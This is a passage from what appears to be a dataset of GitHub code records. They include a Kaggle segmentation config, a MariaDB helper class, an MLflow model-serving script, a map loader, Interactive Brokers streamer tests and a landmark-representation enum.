"line_number": 103, "usage_type": "name"}, {"api_name": "nltk.FreqDist", "line_number": 105, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 107, "usage_type": "call"}, {"api_name": "nltk.tag.pos_tag", "line_number": 111, "usage_type": "call"}, {"api_name": "nltk.tag", "line_number": 111, "usage_type": "attribute"}, {"api_name": "summa.keywords.keywords", "line_number": 122, "usage_type": "call"}, {"api_name": "summa.keywords", "line_number": 122, "usage_type": "name"}, {"api_name": "nltk.pos_tag", "line_number": 124, "usage_type": "call"}, {"api_name": "nltk.pos_tag", "line_number": 127, "usage_type": "call"}, {"api_name": "summa.summarizer.summarize", "line_number": 134, "usage_type": "call"}, {"api_name": "summa.keywords.keywords", "line_number": 136, "usage_type": "call"}, {"api_name": "summa.keywords", "line_number": 136, "usage_type": "name"}, {"api_name": "nltk.pos_tag", "line_number": 137, "usage_type": "call"}, {"api_name": "nltk.edit_distance", "line_number": 148, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 150, "usage_type": "call"}, {"api_name": "nltk.edit_distance", "line_number": 153, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 161, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 161, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 174, "usage_type": "call"}]}
+{"seq_id": "4377916593", "text": "from types import SimpleNamespace\nfrom muti_init import xavier_uniform_init,xavier_normal_init,he_init,kiming_init,orthogonal_init\nfrom segformer import segformer,segformer_layers\nfrom Fsegformer import Fsegformer,Fsegformer_layers\nfrom Usegformer import Usegformer,Usegformer_layers\nfrom senformer import senformer,senformer_layers\nfrom HorNet import hornet,hornet_layers\nfrom coat import coat,coat_layers\nfrom ecoat import ecoat,ecoat_layers\nfrom scoat import scoat,scoat_layers\nfrom fcoat import fcoat,fcoat_layers\nimport os\nfrom collections import defaultdict\n\n'''\n\nmuti scale\n\n\n'''\n'''\nto do...\n\n\n\nmutisampledropoutblock\n'''\n\n'''\n\"label2021\",\"-label2021\",\"--label2021\"\nth=0.55\nscore_th = 0.45\n--label\n\n'''\n\nconfig = SimpleNamespace(**{})\nconfig.folds = [0,1,2,3,4]\n# config.folds = [0,1,2,3,4]\n\nconfig.init = [xavier_uniform_init,xavier_normal_init,he_init,kiming_init,orthogonal_init]\n\nconfig.seed = 2021\nconfig.NUM_WORKERS = 16\nconfig.device_ids =[[3,2,1,0],[4,5,6,7],[0,1,2,3,4,5,6,7]][1]\nconfig.mean = [0.485, 0.456, 0.406]\nconfig.std = [0.229, 0.224, 0.225]\nconfig.img_scale = [(512,512),(768,768),(896,896),(1024,1024)]\nconfig.count ={0: defaultdict(int),1: defaultdict(int),2: defaultdict(int),3: defaultdict(int),4: defaultdict(int)}\n\nconfig.num_classes = 1\nconfig.add_extra_convs = \"on_lateral\"\nconfig.num_outs = 5\nconfig.image_size = 1024\nconfig.mit = 2\nconfig.branch_depth = 6\nconfig.nfolds = 5\n\nconfig.bs = 10\nconfig.head_epoch = 8\nconfig.full_epoch = 200\n\nconfig.head_lr_max =5e-3\nconfig.full_lr_max =slice(2.5e-4,2.5e-3)\n\n# config.model_name = f\"segformer-b{config.mit}\"\n# config.model_name = f\"Fsegformer-b{config.mit}\"\n# config.model_name = f\"hornet-b{config.mit}\"\n# config.model_name = f\"senformer-b{config.mit}\"\n# config.model_name = f\"Usegformer-b{config.mit}\"\nconfig.model_name = f\"coat\"\n# config.model_name = f\"fcoat\"\n# config.model_name = f\"ecoat\"\n# config.model_name = f\"scoat\"\nconfig.organ2label =dict(\n kidney=1,\n prostate=2,\n largeintestine=3,\n spleen=4,\n lung=5)#add\n\n\nconfig.log = \"/home/wangjingqi/hthb/log\"\nconfig.ck = '/home/wangjingqi/hthb/submit/'\nconfig.pretrain = \"/home/wangjingqi/hthb/models\"\nconfig.MASKS = [f'/home/wangjingqi/input/hubmap-organ-segmentation/{config.image_size}/{config.num_classes}/masks',\nf'/home/wangjingqi/input/hubmap-organ-segmentation/{config.image_size}/{config.num_classes}/tta_lung_masks']\n\nconfig.TRAIN = [f'/home/wangjingqi/input/hubmap-organ-segmentation/{config.image_size}/{config.num_classes}/hpa_images',\nf'/home/wangjingqi/input/hubmap-organ-segmentation/{config.image_size}/{config.num_classes}/hubmap_images']\nconfig.LABELS = \"/home/wangjingqi/input/hubmap-organ-segmentation/train.csv\"\nconfig.Data = '/home/wangjingqi/input/hubmap-organ-segmentation/train_images'\n\nconfig.models = {\n \"senformer\":[senformer,senformer_layers],\n \"segformer\":[segformer,segformer_layers],\n \"Fsegformer\":[Fsegformer,Fsegformer_layers],\n \"hornet\":[hornet,hornet_layers],\n \"Usegformer\":[Usegformer,Usegformer_layers],\n \"coat\":[coat,coat_layers],\n \"scoat\":[scoat,scoat_layers],\n \"ecoat\":[ecoat,ecoat_layers],\n \"fcoat\":[fcoat,fcoat_layers]\n\n }\n", "repo_name": "Randle-Github/Kaggle-Image-Segmentation", "sub_path": "hthb/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 3265, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "types.SimpleNamespace", "line_number": 37, "usage_type": "call"}, {"api_name": "muti_init.xavier_uniform_init", "line_number": 41, "usage_type": "name"}, {"api_name": "muti_init.xavier_normal_init", "line_number": 41, "usage_type": "name"}, {"api_name": "muti_init.he_init", "line_number": 41, "usage_type": "name"}, {"api_name": "muti_init.kiming_init", "line_number": 41, "usage_type": "name"}, {"api_name": "muti_init.orthogonal_init", "line_number": 41, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 49, "usage_type": "call"}, {"api_name": "senformer.senformer", "line_number": 95, "usage_type": "name"}, {"api_name": "senformer.senformer_layers", "line_number": 95, "usage_type": "name"}, {"api_name": "segformer.segformer", "line_number": 96, "usage_type": "name"}, {"api_name": "segformer.segformer_layers", "line_number": 96, "usage_type": "name"}, {"api_name": "Fsegformer.Fsegformer", "line_number": 97, "usage_type": "name"}, {"api_name": "Fsegformer.Fsegformer_layers", "line_number": 97, "usage_type": "name"}, {"api_name": "HorNet.hornet", "line_number": 98, "usage_type": "name"}, {"api_name": "HorNet.hornet_layers", "line_number": 98, "usage_type": "name"}, {"api_name": "Usegformer.Usegformer", "line_number": 99, "usage_type": "name"}, {"api_name": "Usegformer.Usegformer_layers", "line_number": 99, "usage_type": "name"}, {"api_name": "coat.coat", "line_number": 100, "usage_type": "name"}, {"api_name": "coat.coat_layers", "line_number": 100, "usage_type": "name"}, {"api_name": "scoat.scoat", "line_number": 101, "usage_type": "name"}, {"api_name": "scoat.scoat_layers", "line_number": 101, "usage_type": "name"}, {"api_name": "ecoat.ecoat", "line_number": 102, "usage_type": "name"}, {"api_name": "ecoat.ecoat_layers", "line_number": 102, "usage_type": "name"}, {"api_name": "fcoat.fcoat", "line_number": 103, "usage_type": "name"}, {"api_name": "fcoat.fcoat_layers", "line_number": 103, "usage_type": "name"}]}
+{"seq_id": "22106041384", "text": "#!/usr/env bin python3.8\r\nimport pymysql\r\nimport sys\r\nfrom Logger import ControllerLogger\r\n\r\nlogger = ControllerLogger()\r\n\r\n\r\nclass ControllerMariaDB(object):\r\n def __init__(self, hostname, username, password, database):\r\n self.hostname = hostname\r\n self.username = username\r\n self.password = password\r\n self.database = database\r\n\r\n def get_connection(self):\r\n try:\r\n con = pymysql.connections.Connection(user=self.username, host=self.hostname,\r\n password=self.password, database=self.database)\r\n logger.set_log_app('info', 'success connection db:{}/{}'.format(self.hostname, self.database))\r\n except pymysql.err.InternalError as err:\r\n logger.set_log_app('critical', err.args)\r\n sys.exit(1)\r\n except pymysql.err.OperationalError as err:\r\n logger.set_log_app('critical', err.args)\r\n sys.exit(1)\r\n return con\r\n\r\n def operational_sql_exec_query(self, *args):\r\n try:\r\n con = self.get_connection()\r\n cursor = con.cursor()\r\n for row_sql in args:\r\n logger.set_log_app('info', 'execute_query {}'.format(row_sql.__str__()))\r\n cursor.execute(row_sql)\r\n cursor.close()\r\n con.close()\r\n except pymysql.err.OperationalError as err:\r\n logger.set_log_app('critical', err.args)\r\n except pymysql.err.InternalError as err:\r\n logger.set_log_app('critical', err.args)\r\n except pymysql.err.ProgrammingError as err:\r\n logger.set_log_app('critical', err.args)\r\n return None\r\n\r\n #: args => tuple datasets data insert\r\n def operational_sql_insert_rows(self, sql_query, *args):\r\n try:\r\n con = self.get_connection()\r\n cursor = con.cursor()\r\n logger.set_log_app('info', 'query : {}'.format(sql_query.__str__()))\r\n cursor.executemany(sql_query, args)\r\n con.commit()\r\n cursor.close()\r\n con.close()\r\n except pymysql.err.OperationalError as err:\r\n logger.set_log_app('critical', err.args)\r\n except pymysql.err.InternalError as err:\r\n logger.set_log_app('critical', err.args)\r\n except pymysql.err.ProgrammingError as err:\r\n logger.set_log_app('critical', err.args)\r\n return None\r\n\r\n #: args => sql set variables in args\r\n def operational_sql_return_data(self, *args):\r\n try:\r\n con = self.get_connection()\r\n cursor = con.cursor()\r\n logger.set_log_app('info', 'query list: {}'.format(args.__str__()))\r\n for row_sql in args:\r\n cursor.execute(row_sql)\r\n con.commit()\r\n cursor.close()\r\n con.close()\r\n except pymysql.err.OperationalError as err:\r\n logger.set_log_app('critical', err.args)\r\n return None\r\n except pymysql.err.InternalError as err:\r\n logger.set_log_app('critical', err.args)\r\n return None\r\n except pymysql.err.ProgrammingError as err:\r\n logger.set_log_app('critical', err.args)\r\n return None\r\n data = cursor.fetchall()\r\n filter_data = [row[0] for row in data]\r\n return filter_data\r\n", "repo_name": "bryanalonso1993/aci_cisco", "sub_path": "infraestructure/Database.py", "file_name": "Database.py", "file_ext": "py", "file_size_in_byte": 3364, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "Logger.ControllerLogger", "line_number": 6, "usage_type": "call"}, {"api_name": "pymysql.connections.Connection", "line_number": 18, "usage_type": "call"}, {"api_name": "pymysql.connections", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 23, "usage_type": "call"}, {"api_name": "pymysql.err", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 26, "usage_type": "call"}, {"api_name": "pymysql.err", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pymysql.err", "line_number": 81, "usage_type": "attribute"}]}
+{"seq_id": "7988628100", "text": "from Model.Treinamento import train\nfrom DataPrep.PreparacaoDados import load_data\nfrom Operationalization.predictions import get_predictions\nimport subprocess\nimport time\nimport mlflow\nfrom mlflow.tracking import MlflowClient\n\n\nkobe_data = load_data('./../../Data/Raw/kobe_dataset.csv')\n\n\ndef extract_relative_path(model_uri, base_path):\n return model_uri.replace(base_path, '')\n\n\ndef get_latest_lr_model_uri(experiment_name):\n base_path = \"file:///home/higoreller/Development/pos_ml_engineering/Code/Operationalization/\"\n client = MlflowClient()\n experiment = client.get_experiment_by_name(experiment_name)\n \n if experiment is None:\n raise ValueError(f\"Experiment '{experiment_name}' not found\")\n \n runs = client.search_runs(experiment_ids=[experiment.experiment_id], order_by=[\"attributes.start_time DESC\"])\n logistic_regression_model_found = False\n\n for run in runs:\n if run.info.status == \"FINISHED\":\n if not logistic_regression_model_found:\n logistic_regression_model_found = True\n else:\n model_uri = run.info.artifact_uri + \"/logistic_regression\"\n relative_model_uri = extract_relative_path(model_uri, base_path)\n return relative_model_uri\n \n raise ValueError(\"No successful model training run found\")\n\n\ndef serve_model():\n # If you need to kill process type it on terminal 'fuser -k 1234/tcp'\n subprocess.Popen([\"fuser\", \"-k\", \"1234/tcp\"])\n time.sleep(1)\n\n # Start the MLflow model server obteined from the train step\n experiment_name = \"Training\"\n model_uri = get_latest_lr_model_uri(experiment_name)\n print(model_uri)\n #model_uri = \"mlruns/796054021220512049/9f2045e593cc4fb5bd237120ec56b423/artifacts/logistic_regression\"\n subprocess.Popen([\"mlflow\", \"models\", \"serve\", \"--model-uri\", model_uri, \"--no-conda\", \"-p\", \"1234\"])\n\n try:\n # Wait for the server to start\n time.sleep(3)\n except Exception as e:\n print(f\"An error occurred: {e}\")\n\n\ndef serve_dashboard():\n subprocess.Popen(['streamlit', 'run', 'dashboard.py'])\n\n\ndef main():\n # Train\n train(kobe_data)\n\n # Start to serve the model\n serve_model()\n\n # Get predictions\n get_predictions(kobe_data, '3PT Field Goal')\n\n # Start streamlit\n serve_dashboard()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n", "repo_name": "higoreller/microsoft_tdsp_ml_engineering", "sub_path": "Code/Operationalization/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2376, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "DataPrep.PreparacaoDados.load_data", "line_number": 10, "usage_type": "call"}, {"api_name": "mlflow.tracking.MlflowClient", "line_number": 19, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 42, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 43, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 50, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 54, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 60, "usage_type": "call"}, {"api_name": "Model.Treinamento.train", "line_number": 65, "usage_type": "call"}, {"api_name": "Operationalization.predictions.get_predictions", "line_number": 71, "usage_type": "call"}]}
+{"seq_id": "41867184988", "text": "import numpy as np\nimport pickle as pk\nfrom PIL import Image\n\ndef get_map(file_name):\n image_path = \"./src/maps/\" + file_name + \".png\"\n color_array = {}\n count = 2 \n image = Image.open(image_path)\n image = image.convert(\"RGB\")\n old_map = np.asarray(image)\n map = np.zeros((old_map.shape[0], old_map.shape[1]))\n for x in range(old_map.shape[0]):\n for y in range(old_map.shape[1]):\n if np.array_equal(old_map[x, y], np.array((0,0,0))):\n map[x,y] = 1\n #adds any other color than black or white as pitfall, can add additional colors here for different enviroments\n elif np.array_equal(old_map[x,y], np.array((255,0,0))):\n map[x,y] = -1\n elif not np.array_equal(old_map[x, y], np.array((255,255,255))):\n map_bytes = old_map[x,y].tobytes()\n if map_bytes in color_array.keys():\n map[x,y] = color_array[map_bytes]\n else:\n map[x,y] = count\n color_array[map_bytes] = count\n count +=1\n return map\n\n\n", "repo_name": "AAIR-lab/CAT-RL", "sub_path": "src/envs/map_maker.py", "file_name": "map_maker.py", "file_ext": "py", "file_size_in_byte": 1117, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "32", "api": [{"api_name": "PIL.Image.open", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 9, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "43422825434", "text": "import time\nfrom datetime import datetime, timedelta\n\nimport pytest\nimport numpy as np\n\nfrom algotradepy.contracts import (\n StockContract,\n PriceType,\n OptionContract,\n Right,\n)\nfrom algotradepy.objects import Greeks\n\nAWAIT_TIME_OUT = 10\n\n\ndef get_streamer(client_id: int):\n pytest.importorskip(\"ib_insync\")\n from algotradepy.connectors.ib_connector import build_and_start_connector\n from algotradepy.streamers.ib_streamer import IBDataStreamer\n\n conn = build_and_start_connector(client_id=client_id)\n streamer = IBDataStreamer(ib_connector=conn)\n\n return streamer\n\n\n@pytest.fixture()\ndef streamer():\n pytest.importorskip(\"ib_insync\")\n from algotradepy.connectors.ib_connector import MASTER_CLIENT_ID\n\n streamer = get_streamer(client_id=MASTER_CLIENT_ID)\n\n yield streamer\n\n streamer.__del__()\n\n\n@pytest.mark.parametrize(\n \"bar_size\",\n [\n timedelta(seconds=5),\n timedelta(seconds=10),\n timedelta(minutes=1),\n timedelta(minutes=2),\n ],\n)\ndef test_subscribe_to_bars_data(streamer, bar_size):\n latest = None\n\n def update(bar):\n nonlocal latest\n latest = bar\n\n contract = StockContract(symbol=\"SPY\")\n streamer.subscribe_to_bars(\n contract=contract, bar_size=bar_size, func=update, rth=False,\n )\n\n streamer.sleep(bar_size.seconds + 10)\n\n assert latest is not None\n assert latest.name > datetime.now() - bar_size - timedelta(seconds=10)\n\n prev = latest.copy()\n latest = None\n streamer.sleep(bar_size.seconds)\n\n assert latest is not None\n assert latest.name > datetime.now() - bar_size\n assert latest.name > prev.name\n\n\ndef test_cancel_bars_data(streamer):\n latest = None\n\n def update(bar):\n nonlocal latest\n latest = bar\n\n contract = StockContract(symbol=\"SPY\")\n streamer.subscribe_to_bars(\n contract=contract,\n bar_size=timedelta(seconds=5),\n func=update,\n rth=False,\n )\n\n streamer.sleep(15)\n\n assert latest is not None\n assert latest.name > datetime.now() - timedelta(seconds=15)\n\n streamer.cancel_bars(contract=contract, func=update)\n last_latest = latest\n streamer.sleep(15)\n\n assert last_latest.name == latest.name\n\n\ndef test_subscribe_to_tick_data(streamer):\n con = None\n ask = None\n bid = None\n mid = None\n\n def update_ask(contract_, price_):\n nonlocal con, ask\n con = contract_\n ask = price_\n\n def update_bid(c, price_):\n nonlocal bid\n bid = price_\n\n def update_mid(c, price_):\n nonlocal mid\n mid = price_\n\n contract = StockContract(symbol=\"SPY\")\n streamer.subscribe_to_tick_data(\n contract=contract, func=update_ask, price_type=PriceType.ASK,\n )\n streamer.subscribe_to_tick_data(\n contract=contract, func=update_bid, price_type=PriceType.BID,\n )\n streamer.subscribe_to_tick_data(\n contract=contract, func=update_mid, price_type=PriceType.MARKET,\n )\n\n t0 = time.time()\n while (\n con is None\n and ask is None\n and bid is None\n and mid is None\n and time.time() - t0 <= AWAIT_TIME_OUT\n ):\n streamer.sleep()\n\n assert con == contract\n assert ask > bid\n assert mid == (ask + bid) / 2\n\n\ndef test_cancel_tick_data(streamer):\n mid = None\n\n def update_mid(c, price_):\n nonlocal mid\n mid = price_\n\n contract = StockContract(symbol=\"SPY\")\n streamer.subscribe_to_tick_data(\n contract=contract, func=update_mid, price_type=PriceType.MARKET,\n )\n\n t0 = time.time()\n while mid is None and time.time() - t0 <= AWAIT_TIME_OUT:\n streamer.sleep()\n\n assert mid is not None\n\n mid = None\n t0 = time.time()\n while mid is None and time.time() - t0 <= AWAIT_TIME_OUT:\n streamer.sleep()\n\n assert mid is not None # was refreshed\n\n streamer.cancel_tick_data(contract=contract, func=update_mid)\n streamer.sleep()\n mid = None\n t0 = time.time()\n while mid is None and time.time() - t0 <= AWAIT_TIME_OUT:\n streamer.sleep()\n\n assert mid is None # did not refresh again\n\n\ndef get_valid_spy_contract(idx) -> OptionContract:\n from ib_insync import IB, Stock\n\n ib = IB()\n ib.connect(clientId=idx + 1)\n ib_stk_con = Stock(symbol=\"SPY\", exchange=\"SMART\", currency=\"USD\")\n ib_details = ib.reqContractDetails(ib_stk_con)[0]\n ib.reqMarketDataType(4)\n tick = ib.reqMktData(contract=ib_stk_con, snapshot=True)\n while np.isnan(tick.ask):\n ib.sleep()\n ask = tick.ask\n ib_con_id = ib_details.contract.conId\n ib_chains = ib.reqSecDefOptParams(\n underlyingSymbol=\"SPY\",\n futFopExchange=\"\",\n underlyingSecType=\"STK\",\n underlyingConId=ib_con_id,\n )\n ib_chain = ib_chains[0]\n ib_chain.strikes.sort(key=lambda s: abs(s - ask))\n strike = ib_chain.strikes[0]\n expiration_str = ib_chain.expirations[idx]\n expiration_date = datetime.strptime(expiration_str, \"%Y%m%d\")\n spy_contract = OptionContract(\n symbol=\"SPY\",\n strike=strike,\n right=Right.CALL,\n multiplier=int(ib_chain.multiplier),\n last_trade_date=expiration_date,\n )\n ib.disconnect()\n\n return spy_contract\n\n\n@pytest.fixture()\ndef first_valid_spy_option() -> OptionContract:\n pytest.importorskip(\"ib_insync\")\n con = get_valid_spy_contract(idx=0)\n return con\n\n\n@pytest.fixture()\ndef second_valid_spy_option() -> OptionContract:\n pytest.importorskip(\"ib_insync\")\n con = get_valid_spy_contract(idx=1)\n return con\n\n\ndef test_subscribe_to_greeks(\n streamer, first_valid_spy_option, second_valid_spy_option,\n):\n first_greek_updates = []\n second_greek_updates = []\n\n def update_first_greeks(greeks: Greeks):\n first_greek_updates.append(greeks)\n\n def update_second_greeks(greeks: Greeks):\n second_greek_updates.append(greeks)\n\n streamer.subscribe_to_greeks(\n contract=first_valid_spy_option, func=update_first_greeks,\n )\n streamer.subscribe_to_greeks(\n contract=second_valid_spy_option, func=update_second_greeks,\n )\n\n while len(first_greek_updates) == 0 or len(second_greek_updates) == 0:\n streamer.sleep()\n\n assert isinstance(first_greek_updates[0], Greeks)\n assert first_greek_updates[-1] != second_greek_updates[-1]\n\n\ndef test_cancel_greeks(streamer, first_valid_spy_option):\n greek_updates = []\n\n def update_greeks(greeks: Greeks):\n greek_updates.append(greeks)\n\n streamer.subscribe_to_greeks(\n contract=first_valid_spy_option, func=update_greeks,\n )\n\n while len(greek_updates) == 0:\n streamer.sleep()\n\n streamer.cancel_greeks(\n contract=first_valid_spy_option, func=update_greeks,\n )\n\n streamer.sleep(1)\n first_len = len(greek_updates)\n streamer.sleep(5)\n\n assert len(greek_updates) == first_len\n", "repo_name": "petioptrv/automated-trading", "sub_path": "tests/streamers/test_ib_streamer.py", "file_name": "test_ib_streamer.py", "file_ext": "py", "file_size_in_byte": 6870, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pytest.importorskip", "line_number": 19, "usage_type": "call"}, {"api_name": "algotradepy.connectors.ib_connector.build_and_start_connector", "line_number": 23, "usage_type": "call"}, {"api_name": "algotradepy.streamers.ib_streamer.IBDataStreamer", "line_number": 24, "usage_type": "call"}, {"api_name": "pytest.importorskip", "line_number": 31, "usage_type": "call"}, {"api_name": "algotradepy.connectors.ib_connector.MASTER_CLIENT_ID", "line_number": 34, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 29, "usage_type": "call"}, {"api_name": "algotradepy.contracts.StockContract", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 65, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 72, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 72, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 41, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 41, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 47, "usage_type": "call"}, {"api_name": "algotradepy.contracts.StockContract", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 94, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 94, "usage_type": "call"}, {"api_name": "algotradepy.contracts.StockContract", "line_number": 122, "usage_type": "call"}, {"api_name": "algotradepy.contracts.PriceType.ASK", "line_number": 124, "usage_type": "attribute"}, {"api_name": "algotradepy.contracts.PriceType", "line_number": 124, "usage_type": "name"}, {"api_name": "algotradepy.contracts.PriceType.BID", "line_number": 127, "usage_type": "attribute"}, {"api_name": "algotradepy.contracts.PriceType", "line_number": 127, "usage_type": "name"}, {"api_name": "algotradepy.contracts.PriceType.MARKET", "line_number": 130, "usage_type": "attribute"}, {"api_name": "algotradepy.contracts.PriceType", "line_number": 130, "usage_type": "name"}, {"api_name": "time.time", "line_number": 133, "usage_type": "call"}, {"api_name": "time.time", "line_number": 139, "usage_type": "call"}, {"api_name": "algotradepy.contracts.StockContract", "line_number": 155, "usage_type": "call"}, {"api_name": "algotradepy.contracts.PriceType.MARKET", "line_number": 157, "usage_type": "attribute"}, {"api_name": "algotradepy.contracts.PriceType", "line_number": 157, "usage_type": "name"}, {"api_name": "time.time", "line_number": 160, "usage_type": "call"}, {"api_name": "time.time", "line_number": 161, "usage_type": "call"}, {"api_name": "time.time", "line_number": 167, "usage_type": "call"}, {"api_name": "time.time", "line_number": 168, "usage_type": "call"}, {"api_name": "time.time", "line_number": 176, "usage_type": "call"}, {"api_name": "time.time", "line_number": 177, "usage_type": "call"}, {"api_name": "ib_insync.IB", "line_number": 186, "usage_type": "call"}, {"api_name": "ib_insync.Stock", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 192, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 206, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 206, "usage_type": "name"}, {"api_name": "algotradepy.contracts.OptionContract", "line_number": 207, "usage_type": "call"}, {"api_name": "algotradepy.contracts.Right.CALL", "line_number": 210, "usage_type": "attribute"}, {"api_name": "algotradepy.contracts.Right", "line_number": 210, "usage_type": "name"}, {"api_name": "algotradepy.contracts.OptionContract", "line_number": 183, "usage_type": "name"}, {"api_name": "pytest.importorskip", "line_number": 221, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 219, "usage_type": "call"}, {"api_name": "algotradepy.contracts.OptionContract", "line_number": 220, "usage_type": "name"}, {"api_name": "pytest.importorskip", "line_number": 228, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 226, "usage_type": "call"}, {"api_name": "algotradepy.contracts.OptionContract", "line_number": 227, "usage_type": "name"}, {"api_name": "algotradepy.objects.Greeks", "line_number": 239, "usage_type": "name"}, {"api_name": "algotradepy.objects.Greeks", "line_number": 242, "usage_type": "name"}, {"api_name": "algotradepy.objects.Greeks", "line_number": 255, "usage_type": "argument"}, {"api_name": "algotradepy.objects.Greeks", "line_number": 262, "usage_type": "name"}]}
+{"seq_id": "23650386449", "text": "\nimport numpy as np\nfrom enum import Enum\n\n\n\nclass LandmarkRepresentation:\n class Representation(Enum):\n GLOBAL_3D = 0\n GLOBAL_FULL_INVERSE_DEPTH = 1\n ANCHORED_3D = 2\n ANCHORED_FULL_INVERSE_DEPTH = 3\n ANCHORED_MSCKF_INVERSE_DEPTH = 4\n ANCHORED_INVERSE_DEPTH_SINGLE = 5\n UNKNOWN = 6\n\n @staticmethod\n def as_string(feat_representation):\n if feat_representation == LandmarkRepresentation.Representation.GLOBAL_3D:\n return \"GLOBAL_3D\"\n if feat_representation == LandmarkRepresentation.Representation.GLOBAL_FULL_INVERSE_DEPTH:\n return \"GLOBAL_FULL_INVERSE_DEPTH\"\n if feat_representation == LandmarkRepresentation.Representation.ANCHORED_3D:\n return \"ANCHORED_3D\"\n if feat_representation == LandmarkRepresentation.Representation.ANCHORED_FULL_INVERSE_DEPTH:\n return \"ANCHORED_FULL_INVERSE_DEPTH\"\n if feat_representation == LandmarkRepresentation.Representation.ANCHORED_MSCKF_INVERSE_DEPTH:\n return \"ANCHORED_MSCKF_INVERSE_DEPTH\"\n if feat_representation == LandmarkRepresentation.Representation.ANCHORED_INVERSE_DEPTH_SINGLE:\n return \"ANCHORED_INVERSE_DEPTH_SINGLE\"\n return \"UNKNOWN\"\n\n @staticmethod\n def from_string(feat_representation):\n if feat_representation == \"GLOBAL_3D\":\n return LandmarkRepresentation.Representation.GLOBAL_3D\n if feat_representation == \"GLOBAL_FULL_INVERSE_DEPTH\":\n return LandmarkRepresentation.Representation.GLOBAL_FULL_INVERSE_DEPTH\n if feat_representation == \"ANCHORED_3D\":\n return LandmarkRepresentation.Representation.ANCHORED_3D\n if feat_representation == \"ANCHORED_FULL_INVERSE_DEPTH\":\n return LandmarkRepresentation.Representation.ANCHORED_FULL_INVERSE_DEPTH\n if feat_representation == \"ANCHORED_MSCKF_INVERSE_DEPTH\":\n return LandmarkRepresentation.Representation.ANCHORED_MSCKF_INVERSE_DEPTH\n if feat_representation == \"ANCHORED_INVERSE_DEPTH_SINGLE\":\n return LandmarkRepresentation.Representation.ANCHORED_INVERSE_DEPTH_SINGLE\n return LandmarkRepresentation.Representation.UNKNOWN\n\n @staticmethod\n def is_relative_representation(feat_representation):\n return feat_representation in [\n LandmarkRepresentation.Representation.ANCHORED_3D,\n LandmarkRepresentation.Representation.ANCHORED_FULL_INVERSE_DEPTH,\n LandmarkRepresentation.Representation.ANCHORED_MSCKF_INVERSE_DEPTH,\n LandmarkRepresentation.Representation.ANCHORED_INVERSE_DEPTH_SINGLE,\n ]", "repo_name": "karthiknambiar29/openvins_python", "sub_path": "src/ov_core/scripts/types/landmarkrepresentation.py", "file_name": "landmarkrepresentation.py", "file_ext": "py", "file_size_in_byte": 2636, "program_lang": "python", "lang": "en", 